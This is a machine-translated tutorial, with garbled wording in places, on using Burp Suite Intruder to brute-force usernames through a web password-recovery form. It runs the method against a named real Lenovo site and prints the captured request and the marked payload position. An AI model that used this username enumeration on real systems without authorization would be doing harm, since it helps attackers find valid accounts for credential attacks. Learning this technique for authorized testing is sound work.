Brute Force attack

Next, talk about brute force alone, which is a very important means of intrusion when it comes to penetration testing.

Here, I only talk about the Web -based violence, and other such as: host, firewall, database, and so the violence to crack, do not speak, we can self-study, we must develop independent self-study habits, encountered problems, and then to solve, that, with doubts to find the answer, Instead of cramming to learn something, in fact, this is Wang Shuang teacher's words, share to everyone.

Burpsuite-intruder Introduction

You can self-study a friend of mine on Burpsuite series of tutorials, Baidu:angelc0de, you will find him.

Burpsuite-intruder: A customized, highly configurable tool that automates attacks on Web applications, such as enumeration identifiers, collecting useful data, and using fuzzing Technical detection of conventional vulnerabilities.

Although it's more complicated, but we only learn his brute force hack function, other whatever.

Example 1, Lenovo PRCCN Station to retrieve the password, violence to guess the station user name,

Guess the premise:

1, no verification code or verification code can be bypassed

2, not limit the number of errors

Exactly, the two conditions are met here at the same time.

Enter user name: 1111111

Using burpsuite to intercept request packets

Post/returnpassword.aspx http/1.1

Host:prccn.lenovo.com.cn

user-agent:mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) gecko/20100101 firefox/40.0

accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-encoding:gzip, deflate

Referer:http://prccn.lenovo.com.cn/returnpassword.aspx

Connection:keep-alive

content-type:application/x-www-form-urlencoded

content-length:256

__viewstate=%2fwepdwukmtq1ode5njeyn2rk4ugfzyijtsxr8zmctv0qudqdpkyth3f%2byk4fssjl1%2fc%3d&__eventvalidation =%2fwewawl8idwzcqkl1bkzcqlmhpebcsekqhvg3t9tyhehngwdzh23hhflgwf%2bt55btyaajjmp&txtusername=1111111& btnsendpassword=%e5%8f%96%e5%9b%9e%e5%af%86%e7%a0%81

Next,ctrl+i, copy the packet below the intercept to Intruder ,

At this point,intruder has the same packet under the intercept .

Now, let's clear all the Browns, then use add to label the txtusername=1111111 key-value pairs with mnemonics, and finally, load the wordlist the dictionary asked intruder To do the violence for us. Guess the user name.

：

Post/returnpassword.aspx http/1.1

Host:prccn.lenovo.com.cn

user-agent:mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) gecko/20100101 firefox/40.0

accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

accept-language:zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-encoding:gzip, deflate

Referer:http://prccn.lenovo.com.cn/returnpassword.aspx

Connection:keep-alive

content-type:application/x-www-form-urlencoded

content-length:256

__viewstate=%2fwepdwukmtq1ode5njeyn2rk4ugfzyijtsxr8zmctv0qudqdpkyth3f%2byk4fssjl1%2fc%3d&__eventvalidation =%2fwewawl8idwzcqkl1bkzcqlmhpebcsekqhvg3t9tyhehngwdzh23hhflgwf%2bt55btyaajjmp&txtusername=§1111111§& btnsendpassword=%e5%8f%96%e5%9b%9e%e5%af%86%e7%a0%81

See, we're going to guess. The username 1111111, has been marked by the $ mnemonic.

Next, load our worldlist user name dictionary,

Under the Playloads tab, select playload type, select Runtime file, choose Select file , and finally, choose our worldlist User name Dictionary

After the dictionary is loaded, locate the Intruder tab in the menu bar, select Start attack,Intruder began to guess for our violence.

：

After a few minutes,intruder to finish the puzzle .

Hey, look at the length field, whether there are unique packet lengths.

length=2482(visually guessing the successful username)

Try it, input:AAA

I don't think so. Continue to view packets of other lengths

Input:Alex , try it.

Or wrong, forget, do not try, in fact, there are more accurate search method, you can see ANGELC0DE series of tutorials, here, no longer repeat.

Brute Force attack